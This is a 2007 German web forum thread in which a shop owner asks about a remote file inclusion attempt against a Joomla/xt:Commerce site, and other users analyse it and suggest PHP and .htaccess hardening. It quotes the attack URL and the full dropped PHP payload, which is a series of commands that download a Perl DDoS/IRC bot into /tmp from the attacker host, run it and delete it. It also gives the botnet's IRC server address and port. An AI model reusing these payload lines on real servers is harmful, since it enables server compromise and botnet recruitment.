Hallo,

Als ich eben in mein "Wer ist online" schaute sah ich das:

00:07:48 0 Guest 193.148.45.19 09:32:48 09:32:48 /shop_content.php/coID/8/product/components/com_istemap/istemap.xml.php?mosConfig_absolute_path=http://alienr0x.by.ru/.spreag.txt?

was soll denn das sein?

''>ZITAT(Christoph @ Jun 8 2007, 9:46) 27445
Hallo,

Als ich eben in mein "Wer ist online" schaute sah ich das:

00:07:48 0 Guest 193.148.45.19 09:32:48 09:32:48 /shop_content.php/coID/8/product/components/com_istemap/istemap.xml.php?mosConfig_absolute_path=http://alienr0x.by.ru/.spreag.txt?

was soll denn das sein?
[/b]
Wenn du Zugriff auf deine Serverlogs hast, schau da mal rein, ansonsten wend dich damit evtl. an deinen Hoster.
Ich kann zwar leider nicht genau sagen, was es ist, aber da hat jemand versucht dir ein Perl-Script für eine DDOS-Attacke unterzujubeln (zumindest vom Namen her).
Ob der Angriff jetzt auf dich gezielt war, oder ob dein Server nur als "Bot" dienen sollte kann ich nicht sagen.
Aber du solltest auf jeden Fall nachschauen, ob derjenige Erfolg hatte.
Leider kenn ich mich mit Linux zu wenig aus um da zu helfen, also würd ich mich evtl. an deinen Hoster wenden, damit der das analysieren kann.

Wenn ich mir diese Scripts so anschaue (letzens gab's hier schonmal was ähnliches) würde ich jedem empfehlen die PHP-Direktive "short_open_tag" ausschalten zu lassen. Dadurch muss zwingend "<?PHP" geschrieben werden statt "<?". Vorher muss aber mal ein Suchen und Ersetzen über den ganzen Shop gemacht werden, weil auch in XTC einige short-tags verwendet wurden.

EDIT: Wenn du jemanden kennst, der russisch sprnicht, wennd dich mal an den Hoster by.ru und lass denen sagen, dass sich ein Kunde als "Hacker" betätigt. Das schaut mir nicht nach einem "Instant"-Hoster aus, also viellenicht haben die seine Personalien.

EDIT2: Google mal bischen gequält: Obwohl's auf den ersten Blick nicht so ausschaut bietet der Betreiber scheinbar doch 1-click-Domains an (sagt zumindest die Googlsche Babelfisch-Übersetzung).

by lockdron

Ich hab mir mal das Perl Script angeschaut. Das ganze Installiert nen IRC Bot der sich dann hier hin connectet:

IP: 81.19.234.32
Port: 60001
Channel: #ddos

Als User: DDoS

MFG

Schau mal mit nmap welche Ports geöffnet sind. Dann siehst du sofort ob der ANgriff geglückt ist oder nicht. Die Datei brauchst du nicht zu suchen da diese Automatisch immer am Ende der Prozedur gelöscht wurde.

MFG

''>ZITAT(dumfpbacke @ Jun 8 2007, 10:59) 27451
Ich hab mir mal das Perl Script angeschaut. Das ganze Installiert nen IRC Bot der sich dann hier hin connectet:

IP: 81.19.234.32
Port: 60001
Channel: #ddos

Als User: DDoS

MFG
[/b]
Gut, ich wollt das Script nicht runterladen und kann kein Perl ^^
Hab mich zwar nicht so stark mit IRC beschäftigt, aber eigentlich dürfte man damit auch einiges an "Schabernack" treiben können.
Übrigens ist das an sich kein XTC-"Problem", sondern eine Sicherheitslücke, die bei der Kombination Joomla+XTC auftritt. Angenommen der "Hack" funktioniert, dann aus folgendem Grund:
XTC benötigt "register_globals" wodurch alle übergebenen Variablen in "echte" Variablen gespeichert werden.
Nun soll dieser Seitenaufruf die Joomla-Variable "mosConfig_absolute_path" überschreiben, die später wahrscheinlich zum Einbinden einer Datei genutzt wird.

Erste Schritte um das zu unterbinden wären:
1. (wie schon erwähnt) keine short_tags erlauben (was aber eigentlich nicht wirklich viel bringt)
2. den Zugriff auf entfernte Daten verbieten (allow_url_fopen)

Das sollte evtl. etwas die Sicherheit erhöhen.

by lockdron

Also mein Webhoster hat folgendes geschrieben:


''>ZITAT</div>dies scheint tatsächlich ein Hackversuch zu sein, ich empfehle Ihnen Zugriffe für externe einbindungen mit einer .htaccess zu sperren.

Sie können diese Einstellung mittels einer .htaccess Datei im Hauptverzeichnis Ihres Webspaces für Ihre Domain umstellen. Erzeugen Sie sich dazu eine Datei namens .htaccess (Punkt Punkt vorn, ohne Endung) und schreiben Sie dort folgenden Inhalt hinein:

RewriteEngine On

RewriteCond %{QUERY_STRING} (. )=http(. ) [NC]
RewriteRule ^(. ) - [F]

Was genau passiert ist lässt sich hier leider nicht genau sagen, da die eingebundene txt File lediglich bewirkt, dass eine wietere Datei auf Ihrem Webspace hinterlegt werden soll:

http://alienr0x.by.ru/.spreag.txt (http://anonym.to/?http://alienr0x.by.ru/.spreag.txt)?

Vermutlich sollte dann genau diese Datei den eigentlichen Hack stattfinden lassen.[/b]

Was bewirkt das? Ist das ok?


Edit: Inhalt der Datei:
''>ZITAT</div><?
passthru('cd /tmp;wget http://alienr0x.by.ru/.ddos.pl;perl (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl;perl) .ddos.pl;rm -f .ddos.pl ');
passthru('cd /tmp;curl -O http://alienr0x.by.ru/.ddos.pl;perl (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl;perl) .ddos.pl;rm -f .ddos.pl ');
passthru('cd /tmp;lwp-download http://alienr0x.by.ru/.ddos.pl;rm (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl;rm) -f .ddos.pl ');
passthru('cd /tmp;lynx -source http://alienr0x.by.ru/.ddos.pl (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl) > .ddos.pl;perl .ddos.pl;rm -f .ddos.pl ');
passthru('cd /tmp;fetch http://alienr0x.by.ru/.ddos.pl (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl) >.ddos.pl;perl .ddos.pl;rm -f .ddos.pl ');
passthru('cd /tmp;GET http://alienr0x.by.ru/.ddos.pl (http://anonym.to/?http://alienr0x.by.ru/.ddos.pl) >.ddos.pl;perl .ddos.pl;rm -f .ddos.pl ');
passthru('cd /tmp;rm -f .ddos.pl ');
passthru('del .ddos.pl ');
?>

[/b]

Du hast ja nen geilen Hoster :)

Das sieht doch jeder der sich ein wenig in der Materie auskennt (was ein Hoster auch unter umständen sollte) das die .txt eine perl datei mit wget saugt. Und die perl Datei bewirkt wiederum einen ddos angriff der versuchensoll den Server so zu Manipulieren das, dass Perl Script den Bot Installieren kann.

Die EInstellung die dir der Hoster geschrieben hat sind auf jeden Fall wirksam ja.

MFG

@dumpfbacke: Was meinst Du mit geilem Hoster? gut? schlecht? und warum?

''>ZITAT(dumfpbacke @ Jun 8 2007, 12:46) 27464
Du hast ja nen geilen Hoster :)

Das sieht doch jeder der sich ein wenig in der Materie auskennt (was ein Hoster auch unter umständen sollte) das die .txt eine perl datei mit wget saugt. Und die perl Datei bewirkt wiederum einen ddos angriff der versuchensoll den Server so zu Manipulieren das, dass Perl Script den Bot Installieren kann.

Die EInstellung die dir der Hoster geschrieben hat sind auf jeden Fall wirksam ja.

MFG
[/b]
"Nett" find ich, dass der wirklich alle Möglichkeiten durchprobiert, die Datei runterzuladen.
Wenn ich das rnichtig verstehe (was ich aber bezweifel) stellt das Perl-Script eine Socketverbindung zu einem IRC-Server her und reagiert dann auf Eingaben vom "Hacker".
Nur hat das Script schon einmal den Mangel, dass der Nick fest ist und ein Nick ist doch nur einmal möglich :/
Also das Prinzip ist wahrscheinlich, dass er mehrere "Bots" sammeln will und dann mit einem Befehl in dem IRC-Server einen DDos-Angriff auf einen X-beliebigen Server starten.

Dein Hoster sollte umgehend prüfen, ob eine Verbindung vom Server ins IRC besteht. Port ist 60001; Adresse müsste mal jemand hierraus: "\x38\x31\x2e\x31\x39\x2e\x32\x33\x34\x2e\x33\x32" extrahieren.
Wenn ja müsste dein Hoster mal nach dem passenden Prozess suchen (kann evtl. jemand erkennen, woraus sich die Prozess-ID zusammensetzt?) und den killen.

Die .htaccess Lösung müsste eigentlich funktionieren, aber das musst du selber mal ausprobieren.

Achja, wenn sich dein Hoster das etwas genauer anschaut, wird er feststellen, dass die nachgeladenen Datei garnicht mehr existiert, weil sie gleich nach dem Ausführen gelöscht wird. Aber der Prozess könnte immernoch laufen.

EDIT: "Geiler Hoster" Meinte er wegen dem Satz "Was genau passiert ist lässt sich hier leider nicht genau sagen,...", das lässt sich nämlich sehr wohl sagen (solange man Perl beherrscht).

by lockdron

@lockdron

die Adresse lautet: IP: 81.19.234.32
Das habe ich oben schon geschrieben ist einfach als Hex abgelegt.

@Christoph
Mit "geilen Hoster" meinte ich genau das was Lockdron unten als Edit geschrieben hat :)

MFG

''>ZITAT(dumfpbacke @ Jun 8 2007, 13:39) 27469
@lockdron

die Adresse lautet: IP: 81.19.234.32
Das habe ich oben schon geschrieben ist einfach als Hex abgelegt.

@Christoph
Mit "geilen Hoster" meinte ich genau das was Lockdron unten als Edit geschrieben hat :)

MFG
[/b]
Sry, wer lesen kann ist klar im Vorteil <_<

by lockdron

Dieser Hackversuch ziehlt einfach auf Joomla-Installationen ab bzw. sind Seiten betroffen die in einer URL "com_komponentenname" enthalten, was bei allen Joomla Seiten der Fall ist.
Hat nichts mit der Kombination mit XTC zu tun.

Bist nicht der einzige "Betroffene":

http://www.google.ch/search?hl=de&q=.s...Suche&meta= (http://anonym.to/?http://www.google.ch/search?hl=de&q=.spreag.txt&btnG=Suche&meta=)
http://www.google.ch/search?hl=de&q=co...Suche&meta= (http://anonym.to/?http://www.google.ch/search?hl=de&q=com_istemap+.spreag.txt&btnG=Google-Suche&meta=)

Wenn du PHP so konfigurierst wie es im Joomla-Backend und während der Installation vorgeschlagen wird passiert da auch nix.